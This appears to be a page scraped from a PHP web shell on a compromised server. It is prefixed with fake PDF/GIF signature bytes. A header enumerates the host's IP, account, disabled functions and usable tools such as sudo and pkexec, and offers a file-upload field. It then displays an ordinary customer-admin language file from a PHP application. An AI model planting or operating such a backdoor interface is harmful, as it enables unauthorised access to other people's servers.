%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.185 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/application/language/english/ |
Upload File : |
<?php /****************************************** US English Admin Customer Language ******************************************/ $lang['customers'] = 'Customers'; $lang['customer_form'] = 'Customer Form'; $lang['firstname'] = 'First Name'; $lang['lastname'] = 'Last Name'; $lang['email'] = 'Email'; $lang['phone'] = 'Phone'; $lang['contact'] = 'Contact'; $lang['locality'] = 'Locality'; $lang['company'] = 'Company'; $lang['active'] = 'Active'; $lang['email_subscribed'] = 'Email Subscribed'; $lang['password'] = 'Password'; $lang['confirm_password'] = 'Confirm Password'; $lang['confirm'] = 'Confirm'; $lang['group_name'] = 'Group Name'; $lang['discount'] = 'Discount'; $lang['discount_type'] = 'Discount Type'; $lang['address'] = 'Address'; $lang['city'] = 'City'; $lang['country'] = 'Country'; $lang['state'] = 'State'; $lang['postcode'] = 'Zip'; $lang['address_information'] = 'Address Information'; $lang['customer_information'] = 'Customer Information'; $lang['addresses_for'] = 'Addresses for %s'; $lang['addresses'] = 'Addresses'; $lang['customer_groups'] = 'Customer Groups'; $lang['group'] = 'Group'; $lang['group_name'] = 'Group Name'; $lang['customer_group_form'] = 'Customer Group Form'; $lang['address_form'] = 'Address Form'; $lang['attributes'] = 'Attributes'; $lang['xml_download'] = 'Export Customers (XML)'; $lang['subscriber_download'] = 'Opt-in Emails (CSV)'; $lang['no_addresses'] = 'There are currently no addresses for this customer.'; $lang['no_customers'] = 'There are currently no customer.'; $lang['message_saved_group'] = 'The customer group has been saved.'; $lang['message_saved_customer'] = 'The customer has been saved.'; $lang['message_saved_address'] = 'The address has been saved.'; $lang['message_customer_deleted'] = 'The customer has been deleted.'; $lang['message_address_deleted'] = 'The address has been deleted.'; $lang['error_not_found'] = 'The requested customer could not be found.'; $lang['error_address_not_found'] = 'The requested address could not be found.'; $lang['error_email_in_use'] = 'The requested email is already in use.'; $lang['confirm_delete_address'] = 'Are you sure you want to delete this address?'; $lang['confirm_delete_group'] = 'Are you sure you want to delete this group?'; $lang['confirm_delete_customer'] = 'Are you sure you want to delete this customer?'; $lang['add_new_address'] = 'Add New Address'; $lang['add_new_group'] = 'Add New Group'; $lang['add_new_customer'] = 'Add New Customer';